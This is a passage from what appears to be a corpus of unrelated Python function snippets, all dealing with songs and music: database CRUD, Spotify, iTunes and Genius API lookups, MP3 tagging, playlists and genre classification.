song)\n song.is_deleted = True\n logging.debug('{CRUD_operations} END function delete_song()')", "def song_found(self, searched_song, result, exact):\n message = {\n \"timestamp\": self._get_time(),\n \"level\": \"INFO\",\n \"type\": \"SONG_FOUND\",\n \"searched_song\": json.dumps(searched_song.to_dict()),\n \"result\": json.dumps(result),\n \"exact\": exact,\n }\n\n self._log_queue.put(json.dumps(message))", "def construct_metadata(song):\n print(song) #temp", "def updatesong(song, fpath):\n song.filename = fpath\n song.save()\n return \"[U] %s\\n\" % song.title", "def add_song(self, name, year, title):\n album_found = find_object(name, self.albums)\n if album_found is None:\n album_found = Album(name, year, self.name)\n self.add_album(album_found)\n album_found.add_song(title)", "def get_song_info(self, song_id):\n return self.__get('song', song_id)", "def test_song_370(self):\n doc = et.parse_xml(SONG_370)\n song = doc.find('song')\n store = DummyStore()\n track = ampache_storage.Track(store, song)\n self.assertEqual(track.get_id(), 'song.3440')\n self.assertEqual(track.parent_id, 'album.359')\n self.assertEqual(track.duration, '0:10:25')\n self.assertEqual(track.get_url(),\n 'http://songserver/ampache/play/index.php?ssid=1e11a4&type=song&oid=3440&uid=4&name=Led%20Zeppelin%20-%20Achilles%20Last%20Stand.mp3')\n self.assertEqual(track.get_name(), 'Achilles Last Stand')\n self.assertEqual(track.title, 'Achilles Last Stand')\n self.assertEqual(track.artist, 'Led Zeppelin')\n self.assertEqual(track.album, 'Presence')\n self.assertEqual(track.genre, None)\n self.assertEqual(track.track_nr, '1')\n self.assertEqual(track.cover, 
'http://songserver/ampache/image.php?id=359&object_type=album&auth=1e11a40&name=art.')\n self.assertEqual(track.mimetype, 'audio/mpeg')\n self.assertEqual(track.size, 19485595)\n self.assertIs(track.get_path(), None)\n self.assertEqual(track.get_children(), [])\n self.assertEqual(track.get_child_count(), 0)", "def addSong(self, title, filename):\n #make sure that the filename is valid? or does this happen outside?\n self.__songDictionary[title]=filename\n return True", "def __init__(self, lyrics_url, artist=None, album_title=None, folder_path=None, song_order=None, cover_size='600'):\n self.album = Album(title=album_title, artist=artist)\n self.artist = artist\n self.album_title = album_title\n self.lyrics_url = lyrics_url\n self.song_order = song_order\n self.folder_path = Path(folder_path) if folder_path else None\n self.cover_file_name = 'cover.jpg'\n self.cover_size = f'{cover_size}x{cover_size}'\n self.track_urls = []\n self.cover_downloaded = False\n \n # self.r = requests.get(lyrics_url).text\n # self.soup = BeautifulSoup(self.r, 'html.parser')\n self.r = requests.get(lyrics_url)\n self.soup = BeautifulSoup(self.r.content, 'html.parser')", "def search_song(title, artist):\n\ttitle = quote(title, safe='')\n\tartist = quote(artist, safe='')\n\tbase_url = SPOTIFY_API_HOST + 'search/' + '?q=track:{0}+artist:{1}&type=track&limit=1'\n\turl = base_url.format(title, artist)\n\tresults = requests.get(url).json()\n\n\ttry:\n\t\tif results['tracks']['total'] == 0:\n\t\t\tlogging.debug('Found no results for song {0}'.format(title))\n\t\t\treturn ''\n\texcept KeyError as e:\n\t\tlogging.warning('Invalid result from spotify on key {0}:\\n{1}'.format(e, results))\n\turi_string = results['tracks']['items'][0]['uri']\n\tlogging.debug('Found uri {0} for song {1}'.format(\n\t\turi_string[uri_string.rfind(':')+1:], title))\n\treturn uri_string[uri_string.rfind(':')+1:] # Strip off the 'spotify:track:' tag.", "def remove_song(self, song):\n # code omitted\n self.playlist.remove(song)", "def onair(self, song, score):\n for key in ['title', 'artist', 'score', 'full']:\n self.memcache.delete(\"%s:1:onair_%s\" % (self.prefix, key))\n\n try:\n datas = mutagen.File(song, easy=True)\n except:\n pass\n\n try:\n self.memcache.set(\"%s:1:onair_title\" % self.prefix, datas[\"title\"][0])\n self.memcache.set(\"%s:1:onair_artist\" % self.prefix, datas[\"artist\"][0])\n self.memcache.set(\"%s:1:onair_score\" % self.prefix, score)\n except:\n pass\n\n try:\n self.memcache.set(\"%s:1:onair_full\" % self.prefix,\n \"%s - %s\" % (datas[\"artist\"][0],\n datas[\"title\"][0]))\n except:\n pass", "def classify(cls, title):\n\t\tpairs_list = TitleClassifier.reduce(TitleClassifier.classify_words(title))\n\t\treduced_list = [ cl for (cl, w) in pairs_list ]\n\t\tword_list = [ w for (cl, w) in pairs_list ]\n\t\tbrand_classes = [ ['russian', 'braced_ru'],\n\t\t\t['latin', 'braced_ru'],\n\t\t\t['latin', 'braced_lat'],\n\t\t\t['russian', 'braced_lat'],\n\t\t\t['latin', 'dash', 'russian', 'braced_ru'],\n\t\t\t['russian', 'dash', 'latin', 'braced_ru']\n\t\t]\n\t\tif reduced_list in brand_classes:\n\t\t\t#TODO: brand name extraction here\n\t\t\tif 'russian' in reduced_list:\n\t\t\t\tk = 'russian'\n\t\t\telif 'braced_ru' in reduced_list:\n\t\t\t\tk = 'braced_ru'\n\t\t\tname = ''\n\t\t\tfor cl, val in pairs_list:\n\t\t\t\tif cl == k:\n\t\t\t\t\tname += val\n\t\t\treturn (True, name.strip(\" ()\"))\n\t\telse:\n\t\t\treturn (False, None)", "def classify_encapsulated(audio_summary, track_info, pickle_file):\n\tf = open(pickle_file, 
'r')\n\tfit = pickle.load(f)\n\tf.close()\n\trv = {}\n\t#print track_info.keys()\n\t#print track_info[audio_summary]['title'].keys()\n\trv[\"speechiness\"] = [audio_summary['audio_summary']['speechiness']]\n\trv[\"time_sig\"] = [audio_summary['audio_summary']['time_signature']]\n\trv[\"bpm\"] = [audio_summary['audio_summary']['tempo']]\n\trv[\"key\"] = [audio_summary['audio_summary']['key']]\n\trv[\"duration\"] = [audio_summary['audio_summary']['duration']]\n\trv[\"loudness\"] = [audio_summary['audio_summary']['loudness']]\n\trv[\"end_of_fade_in\"] = [track_info['track']['end_of_fade_in']]\n\trv[\"start_of_fade_out\"] = [track_info['track']['start_of_fade_out']]\n\trv[\"bpm_range\"] = [proc.bpm_range(track_info['beats'])]\n\trv[\"max_bpm_spike\"] = [proc.max_bpm_spike(track_info['beats'])]\n\ttry:\n\t\trv[\"num_keys\"] = [proc.num_keys(track_info['sections'])]\n\texcept:\n\t\trv[\"num_keys\"] = [1]\n\trv[\"sections\"] = [proc.num_sections(track_info['sections'])]\n\tnew_df = build_data_frame([rv],[\"Unknown\"])\n\tp = prob_category(new_df,fit)\n\trobjects.globalenv[\"pred\"] = p\n\tedm_prob = robjects.default_ri2py(p.rx(1))[0]\n\tfolk_prob = robjects.default_ri2py(p.rx(2))[0]\n\trap_prob = robjects.default_ri2py(p.rx(3))[0]\n\tcls = classify(new_df,fit)\n\treturn [(edm_prob,folk_prob,rap_prob),cls[0]]", "def set_song_fingerprinted(self, song_id):\n song = Songs.get(id=song_id)\n song.fingerprinted = True\n song.save()", "def bottle_song_for(num):\n pass", "def fetch_info(self, minimal: bool = False) -> None:\n self.found = False\n query: str = self.get_query(minimal)\n if not query:\n raise RuntimeError('No song has been defined.')\n # Prepare the API call.\n data: Any = None\n # Generate a list of english countries as alternatives to US to use whenever no result for a song is found.\n countries: List[str] = ['US', 'GB', 'AU']\n for country in countries:\n params: str = 'country=' + country + '&entity=song&limit=100&version=2&explicit=Yes&media=music'\n url: str = 'https://itunes.apple.com/search?term=' + parse.quote_plus(query) + '&' + params\n # Load results from iTunes API endpoint.\n data = Song.__fetch_from_url(url)\n if data:\n break\n if not data:\n title: str = Utils.Utils.str(self.title)\n Logger.Logger.log('Song ' + title + ' not found (query: ' + Utils.Utils.str(self.query) + ').')\n return\n # Update the song properties according to information returned by iTunes.\n self.__set_info_from_itunes(data, query)\n self.found = True\n if self.query_accuracy < 100:\n # If query accuracy was not the best, reprocess it using new information.\n self.__generate_search_query()", "def add_song(self):\r\n path = input(\"Give file path:\\t\") # Request file path\r\n path = path.replace('\\\\', '/')\r\n if self.path_song_re.match(path) and not self.path_storage_re.match(\r\n path): # Check that the path leads to a song that is not already found in Storage\r\n copy(path, self.p_storage) # Copy the song to the storage directory\r\n file_title, form = path.split(\"/\")[-1].split(\".\") # Save file title and format from the path\r\n sql = \"SELECT COUNT(*) FROM songs WHERE file_title = %s AND form = %s\" # Check the existence of a song\r\n # with the same title and format in the database\r\n self.cursor.execute(sql, (file_title, form))\r\n r = self.cursor.fetchall()\r\n if r[0][0] != 0:\r\n return \"A song with this file name and format already exists!\"\r\n song_title = input(\"Song title:\\t\")\r\n artist = input(\"Artist:\\t\")\r\n data = input(\"Release date:\\t\")\r\n tags = input(\"Associated 
tags:\\t\")\r\n sql = \"INSERT INTO songs (file_title, song_title, artist, form, data, tag) VALUES (%s, %s, %s, %s, %s, \" \\\r\n \"%s) \" # Insert song into database\r\n columns = (file_title, song_title, artist, form, data, tags)\r\n self.cursor.execute(sql, columns)\r\n self.cnx.commit()\r\n self.cursor.execute(\r\n \"SELECT MAX(ID) FROM songs\")\r\n result = self.cursor.fetchall()\r\n return \"New song ID: \" + str(result[0][0])\r\n else:\r\n return \"Give valid path\"", "def detect_netease_music_name(file_path, dist_path, KEEP_SOURCE=True):\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0\"\n }\n url_base = \"http://music.163.com/api/song/detail/?id={}&ids=[{}]\"\n\n if not os.path.exists(dist_path):\n os.mkdir(dist_path)\n\n for file_name in os.listdir(file_path):\n if not file_name.endswith(\".mp3\"):\n continue\n if not len(file_name.split(\"-\")) == 3:\n print(\n \">>>> File %s not in format <song id>-<bite rate>-<random number>.mp3\"\n % (file_name)\n )\n continue\n\n try:\n song_id = file_name.split(\"-\")[0]\n url_target = url_base.format(song_id, song_id)\n resp = requests.get(url_target, headers=headers)\n rr = json.loads(resp.text)\n\n tt = eyed3.load(os.path.join(file_path, file_name))\n tt.tag.title = rr[\"songs\"][0][\"name\"].replace(\"\\xa0\", \" \")\n tt.tag.artist = rr[\"songs\"][0][\"artists\"][0][\"name\"]\n tt.tag.album = rr[\"songs\"][0][\"album\"][\"name\"]\n tt.tag.album_artist = rr[\"songs\"][0][\"album\"][\"artists\"][0][\"name\"]\n print(\n \"song_id = %s, tt.tag title = %s, artist = %s, album = %s, album_artist = %s\"\n % (\n song_id,\n tt.tag.title,\n tt.tag.artist,\n tt.tag.album,\n tt.tag.album_artist,\n )\n )\n tt.tag.save()\n except UnicodeEncodeError as e:\n print(\n \">>>> UnicodeEncodeError, try again later: file_name = %s, error = %s\"\n % (file_name, str(e))\n )\n continue\n except:\n print(\">>>> Some other error happens: file_name = %s\" % (file_name))\n continue\n\n dist_name = (\n os.path.join(\n dist_path,\n \"%s - %s\"\n % (tt.tag.artist.replace(\"/\", \" \"), tt.tag.title.replace(\"/\", \" \")),\n )\n + \".mp3\"\n )\n \n if KEEP_SOURCE == True:\n shutil.copyfile(os.path.join(file_path, file_name), dist_name)\n else:\n os.rename(os.path.join(file_path, file_name), dist_name)", "def __init__(self, song_name, lyrics, valence):\n self.name = song_name\n self.lyrics = lyrics\n self.valence = valence\n self.lexD = None\n self.emotion = None\n self.sentiment = None\n self.color = None\n self.gloom = None", "def add_song_to_playlist(self):\n #populate our songs dictionary\n self.get_liked_videos()\n\n #collect all of uri\n uris = []\n for song,info in self.all_song_info.items():\n uris.append(info[\"spotify_uri\"])\n\n #create a new playlist\n playlist_id = self.create_playlist()\n\n #add all songs into new playlist\n\n #Spotipy can only add 100 songs at a time to a playlist that is why this method is taken\n g = len(uris)\n if g > 100:\n s = 0\n e = 99\n while g > 100:\n self.sp.user_playlist_add_tracks(user=self.username, playlist_id=playlist_id,\n tracks=uris[s:e])\n g -= 100\n s = e + 1\n e += 100\n self.sp.user_playlist_add_tracks(user=self.username, playlist_id=playlist_id,\n tracks=uris[s:])\n else:\n self.sp.user_playlist_add_tracks(user=self.username, playlist_id=playlist_id,\n tracks=uris)", "def scrape_song_to_db(self, artist, title, track_id):\n\n # remove featured artist names\n artist = stripFeat(artist)\n\n try:\n # record stout from lyricsgenius call because it catches 
errors and prints\n with Capturing() as output:\n songdata = self.api.search_song(title, artist)\n\n # for the few errors that have been raised\n except ReadTimeout:\n self.api.sleep_time += 3\n print(f\"sleep time increased to {self.api.sleep_time}\")\n self.record_error(track_id, \"ReadTimeout\")\n self.scrape_song_to_db(artist, title, track_id)\n return\n\n # take sleep time slowly back to minimum\n if self.api.sleep_time > self.minsleep:\n self.api.sleep_time -= 0.25\n print(f\"sleep time decreased to {self.api.sleep_time}\")\n\n # search successful\n if songdata != None:\n self.record_lyrics_result(track_id, songdata)\n\n # handle (record & retry) Timeout error\n elif output[1].startswith(\"Timeout\"):\n self.api.sleep_time += 3\n self.record_error(track_id, \"Timeout\")\n self.scrape_song_to_db(artist, title, track_id)\n return\n\n # record error: not in genius db\n elif output[1].startswith(\"No results\"):\n self.record_error(track_id, \"no_results\")\n\n # record error: song without lyrics\n elif output[1] == \"Specified song does not contain lyrics. Rejecting.\":\n self.record_error(track_id, \"lacks_lyrics\")\n\n # record error: URL issue\n elif (\n output[1]\n == \"Specified song does not have a valid URL with lyrics. Rejecting.\"\n ):\n self.record_error(track_id, \"invalid_url\")", "def query_get_song_recommendation(songtitle, artist, root):\n for child in root:\n if (song_information.get_songtitle(child) == songtitle\n and song_information.get_artist(child) == artist):\n song = child\n else:\n answer = (\"Sorry, '\" + songtitle + \"' by \" + artist\n + \"could not be found in this corpus\")\n similar_songs = find_similar_songs(song, root)\n if len(similar_songs) > 0:\n answer = (\"If you like '\" + songtitle + \"' by \" + artist\n + \", you might like \" + \", \".join(similar_songs))\n else:\n answer = (\"Sorry, there is no similar song to '\" + songtitle + \"' by \"\n + artist + \" in this corpus\")\n return answer", "def _classify(self, example):\n neighbors = self.find_neighbor(example)\n class_label = self.find_response(neighbors)\n return class_label", "def prob_category(new_music, fit):\n\tr = robjects.r\n\t#Be careful not to include the word 'data' in the function call below, although data is a keyword\n\tpredictions = r.predict(fit,new_music,type=\"prob\")\n\treturn predictions", "def add_song(self, name, year, title):\n\n # Here we check if album exist under artist.\n album_found = find_object(name, self.albums)\n if album_found is None: # If there is no album found\n print(name + \"not found\") # we print \"Album name not found\n album_found = Album(name, year, self.name) # Change_3: Pass \"self.name\" instead of \"self\"\n self.add_album(album_found) # We add new_album to song.\n else: # if we found an existing album with same name\n print(\"found album\" + name) # we print found album name\n\n # so we add song to album_found\n album_found.add_song(title)", "def new_song():\n song_id = int(request.args['song_id'])\n track_info = shiva.get_tracks([song_id])[song_id]\n vlc.add_song(track_info['path'])\n return 'ok'", "def get_song(self, song_id):\n url = get_song_url(song_id)\n result = self.get_request(url)\n\n return result['songs'][0]", "def get_song_name_from_result(result):\n return result['metadata']['music'][0]['external_metadata']['spotify']['track']['name']", "def play(song):\n # Show the metadata\n if (verbose==True):\n for s in song.keys():\n print s, \":\", \n print song[s]\n else:\n print \"Title:\", song[\"title\"]\n print \"Artisit:\", 
song[\"artist\"]\n print \"Album:\", song[\"albumtitle\"]\n print \"Year\", song[\"public_time\"]\n print \"Company:\", song[\"company\"]\n print \"Length\", song[\"length\"]\n print \"Playing...\"\n mp3_url = song[\"url\"]\n song_length = song[\"length\"]\n p = subprocess.Popen([\"mplayer\", \"-msglevel\", \"all=0\", mp3_url])\n\n # At the same time, download the song:\n u = urllib2.urlopen(mp3_url)\n local_mp3 = open(song[\"title\"] + \"-\" + song[\"artist\"] + \".mp3\", \"w\")\n local_mp3.write(u.read())\n local_mp3.close()\n # time.sleep(song_length)\n i = 0\n while(True):\n time.sleep(1)\n i += 1\n if i == song_length:\n # Kill the process when the song is finished.\n p.terminate()\n print \"#\" * 80\n break", "def __add_artist(self, artist, genius_api):\n\t\tentry = {\n\t\t\t'id' : int(artist['id']),\n\t\t\t'name' : artist['name'].lower(),\n\t\t\t'is_verified' : artist['is_verified'],\n\t\t\t'url' : artist['url'],\n\t\t\t'songs' : genius_api.get_artist_songs_id(artist['id'], artist_name=artist['name'])\n\t\t\t}\n\t\t\t\t#Step 3: Insert Artist into MongoDB via isnert_one\n\t\tself.db.artists.insert_one(entry)", "def add_song(self, song, position=None):\n\n # Use find_object to see if the song exist already.\n song_found = find_object(song, self.tracks) # look for song.tracks to see if it exist in the list\n if song_found is None: # if song is not found\n song_found = Song(song, self.artist) # We create new song using \"Song\" function and assign it to song_found\n if position is None: # If there are no songs in this track\n self.tracks.append(song_found) # Add this song_found in the first position\n else: # else if there are already some songs in the track\n self.tracks.insert(position, song_found) # inserts the position and song in self.tracks list", "def __set_info_from_itunes(self, data: Any, query: str) -> None:\n if data['resultCount'] == 0:\n return\n Logger.Logger.log('Processing metadata from iTunes...')\n index: int = 0\n if data['resultCount'] != 1 and not Config.Config.get_strict_meta():\n Logger.Logger.log('Multiple results returned by iTunes, filtering them...')\n index = Song.__filter_itunes_results(data['results'], query)\n data = data['results'][index]\n # Add support for album artist and composer.\n self.title = data['trackName']\n self.artist = data['artistName']\n self.album_artist = data['artistName']\n self.genre = data['primaryGenreName']\n self.album = data['collectionName']\n release_date: datetime = datetime.strptime(data['releaseDate'], '%Y-%m-%dT%H:%M:%SZ')\n self.year = release_date.year\n self.cover_url = data['artworkUrl100'].replace('100x100bb.jpg', '1000x1000bb.jpg')\n self.disc_count = data['discCount']\n self.disc_number = data['discNumber']\n self.track_count = data['trackCount']\n self.track_number = data['trackNumber']\n # TODO: Currently iTunes doesn't support information about group and composer.\n # self.group = data['artistName']\n # self.composer = data['artistName']\n if data['trackExplicitness'] == 'explicit':\n self.explicit = True\n else:\n self.explicit = False\n self.album_url = data['artistViewUrl']\n self.track_url = data['trackViewUrl']", "def getSong(self):\n queue = self.instantiate_queue()\n song_data = queue.pop(0)\n\n history = self.instantiate_history()\n history_song_data = deepcopy(song_data)\n history_song_data['time_played'] = time() + 5\n history.append(history_song_data)\n\n if len(queue) < 5:\n self.addImplicit(queue, history)\n \n self.ageSongs(queue)\n self.calculateScore(queue)\n queue = self.sortSongs(queue)\n\n 
self.cache.set('queue', queue)\n self.cache.set('history', history)\n\n keys = ['name', 'track_id', 'artist', 'album_uri', 'album_name', 'duration', 'explicit', 'valence', 'energy']\n args = [song_data[key] for key in keys]\n return Song(*args)", "def update_song(_id, _name_of_the_song, _duration_in_number_of_seconds):\r\n song_to_update = Song.query.filter_by(id=_id).first()\r\n song_to_update.name_of_the_song = _name_of_the_song\r\n song_to_update.duration_in_number_of_seconds = _duration_in_number_of_seconds\r\n db.session.commit()", "def find_song(spotify, query, matchRatio=0.75):\n results = spotify.search(\"track:\\\"\" + query + \"\\\"\", limit=50, type='track')\n candidates = list(map(lambda track: {'name': track['name'], 'uri': track['uri']}, \n results['tracks']['items']))\n for candidate in candidates:\n matcher = difflib.SequenceMatcher(None, candidate['name'].lower(), query.lower())\n if matcher.ratio() >= matchRatio:\n print(\"Adding song \" + candidate[\"name\"] + \" for \" + query)\n return candidate['uri']\n print(\"Found no matches for \" + query)\n return None", "def classify(self, data):\n abstract", "def predict_best_songs(track_id):\n #This will give us a list of features necessary for prediction\n #Code by Ekaterina & Hernan\n song_to_predict = get_features(track_id)\n #Add song to existing DB\n #Code by Hernan\n add_song(song_to_predict)\n #This K Means model will give us a list of recommended songs\n #Code by Josh\n def predicto(track_id):\n # Instantiate and fit knn to the correct columns\n knn = NearestNeighbors(n_neighbors=20)\n knn.fit(df[df.columns[5:]])\n obs = df.index[df['id'] == track_id]\n series = df.iloc[obs, 5:].to_numpy()\n neighbors = knn.kneighbors(series)\n new_obs = neighbors[1][0][6:20]\n return list(df.loc[new_obs, 'id'])\n #Converting the DB to a DF to run a K Means model through\n conn = sqlite3.connect('sprs/spotitry_songs.db')\n curs = conn.cursor()\n SQL_Query = pd.read_sql_query(''' SELECT * from song ''',conn)\n df = pd.DataFrame(SQL_Query, columns=['id','name','energy',\n 'liveness','danceability','instrumentalness','loudness',\n 'speechiness','valence','tempo'])\n track_list = predicto(track_id)\n #Here we'll turn our list of track ids into song names\n #Code by Ekaterina & Hernan\n #Re-written by Hernan to return json with feature list\n suggestions = get_features(track_list[0])\n column_names = ['track_id', 'name', 'acousticness', 'danceability', 'duration_ms', 'energy', 'instrumentalness',\n 'liveness', 'loudness', 'speechiness', 'tempo', 'valence']\n final = pd.DataFrame([suggestions], columns=column_names)\n result = final.to_json()\n return result", "def get_songs(self, song_list):\n self.songs = [[s.name, s.movie_name] for s in song_list\n if s.raga == self.name]", "def artist_song_first_pass(self):\n log.debug(\"Called artist_song_first_pass for %s.\" % self.name)\n self.success = False\n song_potentials = []\n potential_count = 0\n _min = 20\n\n def generate_potentials(count):\n results = self.sp.search(q= 'artist: ' + self.artist + ' track: ' + self.song, type='track', limit=2)\n if results['tracks']['total'] >= 1:\n for items in results['tracks']['items']:\n song_potentials.append([items['name'], items['uri']])\n for artist in items['artists']:\n song_potentials[count].append(artist['name'])\n song_potentials[count].append(artist['uri'])\n count += 1\n\n for splitter in splitters:\n if self.name_clean.count(splitter) == 1:\n self.artist, self.song = self.name_clean.split(splitter)\n generate_potentials(potential_count)\n elif 
self.name_clean.count(splitter) > 1:\n for x in range(0, self.name_clean.count(splitter)):\n self.artist, self.song = split(self.name_clean, splitter, x)\n generate_potentials(potential_count)\n\n cutoff = matching(self.name_clean)\n log.debug(\"%s potential matches found for %d\" % (len(song_potentials), id(self)))\n log.debug(\"Potentials: %s\" % song_potentials)\n for potential in song_potentials:\n log.debug(potential)\n log.debug(self.name_clean)\n log.debug(str(potential[2]) + \" \" + str(potential[0]))\n lev = levenshtein(self.name_clean, str.lower(str(potential[2])) + \" \" + str.lower(str(potential[0])))\n log.debug(lev)\n if lev < _min:\n _min = lev\n self.artist = potential[2]\n self.artist_uri = potential[3]\n self.song = potential[0]\n self.song_uri = potential[1]\n\n if self.artist_uri and self.song_uri is not None:\n log.debug(\"Cutoff point for %s : %d\" % (id(self), cutoff))\n log.debug(\"Current Min: {}\".format(_min))\n log.debug(\"Levenshtein distance between {} and {} : {}\"\n .format(self.name_clean, self.artist + self.song,\n levenshtein(self.name, self.artist + \" \" + self.song)))\n if int(_min) > cutoff:\n log.debug(\"Method artist_song_first_pass failed for %s.\" % self.name)\n self.success = False\n self.artist = None\n self.song = None\n else:\n log.debug(\"Method artist_song_first_pass succeeded for %s.\" % self.name)\n self.success = True\n else:\n log.debug(\"Method artist_song_first_pass failed for %s.\" % self.name)\n self.success = False\n self.artist = None\n self.song = None", "def FromMeta(self, artist, album, track_number, song):\n\n # Cleanup input\n artist = artist.rstrip()\n album = album.rstrip()\n song = song.rstrip()\n\n self.persistant = self.db.GetOneRow('select * from tracks where '\n 'artist=%s and album=%s '\n 'and number=%d and song=%s;'\n %(sql.FormatSqlValue('artist',\n artist),\n sql.FormatSqlValue('album',\n album),\n track_number,\n sql.FormatSqlValue('song',\n song)))\n\n if not self.persistant:\n self.persistant = {}\n self.persistant['artist'] = artist\n self.persistant['album'] = album\n self.persistant['number'] = track_number\n self.persistant['song'] = song\n\n self.persistant['plays'] = 0\n self.persistant['skips'] = 0\n self.persistant['creation_time'] = datetime.datetime.now()", "def song_has_lyrics():\n pass", "def put(self, request):\n ProcessingService.save_file(uploaded_file=request.data['file'],\n artist=request.data['artist'], title=request.data['title'])\n tasks.process_audio.delay(uploaded_file_path=settings.FILE_UPLOAD_DIR + request.data['file'].name,\n artist=request.data['artist'], title=request.data['title'])\n return Response(status=status.HTTP_200_OK)", "def createsong(tags, sig, fpath, played=0):\n\n song = Song.objects.create(artist=tags['artist'],\n album=tags['album'],\n title=tags['title'],\n genre=tags['genre'],\n score=0,\n played=played,\n uniq=sig,\n global_score=0,\n filename=fpath)\n # lookup to fill cover\n picture.delay(song)\n \n if hasattr(song, 'title') and song.title != '':\n try:\n song.genre += ','.join(get_tags(song.artist, song.title))\n except:\n pass\n song.save()\n return \"[I] %s\\n\" % song.title", "def next_song(sid):\n try:\n # Get the host data from the database\n db = sqlite3.connect('/home/tropius/TROPIUS/TROPIUS.db')\n host = hosts.get_detail(db, sid)\n spotify.next(host['ip'])\n return jsonify({})\n except:\n abort(400)", "def set_happy_song(self, song_number):\n self._happy_song_num = int(math.fabs(song_number)) % 5\n\n # Song is in c major scale and is the 5th (G) to the 3rd 
(E).\n cmd = \"140 \" + str(self._happy_song_num) + \" 2 64 16 67 16\"\n\n self._serial_conn.send_command(cmd)", "def classical_search(data, primary, genre):\n __counter = 0 # count total number of songs get\n __browser = chrome_driver_setup()\n\n # read data file, extract list of artists\n artists = txt_to_list(data, delimiter=',')\n\n # for each artist, find artist id and then output list of album names\n __index = 0\n make_directory(\"results/{}\".format(primary))\n filecount = 0\n while filecount <= len(artists)//10:\n print(\"========== Starting for batch {} - {} ==========\".format(filecount*10,(filecount+1)*10))\n for artist in artists[filecount*10:(filecount+1)*10]:\n print(\" NOW FOR ARTIST: {} \".format(artist))\n aid = get_artist_id(artist)\n if aid is None:\n print(\"Cannot find artist {} in Spotify.\".format(artist))\n continue\n album_ids = get_artist_albums_classical(aid)\n for album in album_ids:\n tracks = get_album_tracks(album, 'name')\n if tracks is None:\n print(\"Artist {} has no album found in Spotify.\".format(artist))\n continue\n for track in tracks:\n if track is None or track == \"\":\n print(\"Empty track, skip...\")\n continue\n print(\"Current track: {}\".format(track))\n sleep(randint(3, 5))\n __index += 1\n link, score, title, duration = get_song_for_classical(track, __browser, genre)\n if link == \"skipped\":\n print(\"Duplicate, skip...\")\n continue\n csv_writer_append(\"results/{}/{}_{}.csv\".format(primary, genre, filecount+1),\n __index,\n track,\n title,\n link,\n score,\n duration)\n print(\"{} -- CSV done: {} {} {} {}\".format(__index, title, link, score, duration))\n print(\"\")\n print(\"||||||||||| Finished for batch {} - {} |||||||||||\".format(filecount*10,(filecount+1)*10))\n filecount += 1", "def add_the_song_to_playlist(self):\n com_util.tap_on(self.driver, element['AddToPlaylist'])\n # com_util.send_to(self.driver, element['EnterThePlaylist'], 'My Songs')\n com_util.tap_on(self.driver, element['ClickMySongs'])\n # com_util.tap_on(self.driver, element['SaveBtn'])\n com_util.tap_on(self.driver, element['CancelBtn'])\n com_util.tap_on(self.driver, element['DownArrow'])", "def search_with_song(song_name: str, mode: int) -> str:\n SONG_NAME = 1\n db = get_db_name_by_mode(mode)\n song_list = get_singers_and_songs_by_mode(mode)[1]\n res = []\n songs_data = []\n\n db_connection = sqlite3.connect(db)\n if get_acceleration_flag(mode, True):\n for letter in song_name:\n db_cursor = db_connection.cursor()\n db_cursor.execute('SELECT * FROM TEST WHERE SONG LIKE \"%' + letter + '%\"')\n songs_data.extend([song for song in db_cursor.fetchall()])\n pass\n songs_data = list(dict.fromkeys(songs_data))\n similar_songs = [song[SONG_NAME] for song in songs_data]\n similar_songs = compare.compare(similar_songs, song_name, ac=True)\n for song_with_similar_score in similar_songs: # pick the song in similar_songs from in songs_data\n for song_info in songs_data:\n if song_with_similar_score[SONG_NAME] == song_info[SONG_NAME]:\n res.append(song_info)\n break\n pass\n else:\n similar_songs = compare.compare(song_list, song_name)\n for song_with_similar_score in similar_songs:\n db_cursor = db_connection.cursor()\n db_cursor.execute('SELECT * FROM TEST WHERE SONG = \"' + song_with_similar_score[SONG_NAME] + '\"')\n res.extend(db_cursor.fetchall())\n pass\n pass\n db_connection.close()\n\n if len(res) == 0:\n return response.pack(response.EMPTY, res)\n else:\n return response.pack(response.SUCCESS, res)\n pass", "def notify_song_found(song, station_frequency, 
favourite=False):\n display_screen(song, station_frequency)\n if switches.is_active_announce_all_songs_switch() or favourite:\n say_information_out_loud(song, station_frequency)", "def classify(model, featuresFile='tmp/features.txt'):\n\n # Use external svm_classify to classify audio using the given features\n subprocess.call(['svm_classify', featuresFile, model, 'tmp/result.txt'])\n\n # Read results\n results = []\n with open('tmp/result.txt', 'r') as f:\n results = f.readlines()\n for i in range(0, len(results)):\n results[i] = 'Music' if float(results[i]) > 0 else 'Speech'\n\n return results", "def set_artist_song_entry(self, artist, song):\n self.artist_name.set_text(artist)\n self.song_name.set_text(song)", "def song_save(song_id):\r\n querystring = apiurl_musixmatch + \"track.lyrics.get?track_id=\" + urllib2.quote(\r\n song_id) + \"&apikey=\" + apikey_musixmatch + \"&format=plain\"\r\n try:\r\n request = urllib2.Request(querystring)\r\n # timeout set to 4 seconds; automatically retries\r\n response = urllib2.urlopen(request, timeout=4)\r\n # raw = response.read()\r\n print colored.green(\"Starting\", bold=12)\r\n all_data = ''\r\n while True:\r\n do_task()\r\n print '\\b.',\r\n sys.stdout.flush()\r\n data = response.read(2048)\r\n if not data:\r\n break\r\n all_data += data\r\n time.sleep(0.4)\r\n print \"\\n\"\r\n json_obj = json.loads(all_data.decode(\"utf-8\"))\r\n body = json_obj[\"message\"][\"body\"][\"lyrics\"][\"lyrics_body\"]\r\n if body == 0:\r\n print colored.red(\"No lyrics found\", bold=12)\r\n else:\r\n song_found = SongLyricsFinder(song_id, body)\r\n session.add(song_found)\r\n session.commit()\r\n print colored.green(\"Song saved successfully.\", bold=12)\r\n except socket.timeout:\r\n print \"Timeout raised and caught\"", "def ft_in_title(self, item, drop_feat):\n artist = item.artist.strip()\n albumartist = item.albumartist.strip()\n\n # Check whether there is a featured artist on this track and the\n # artist field does not exactly match the album artist field. 
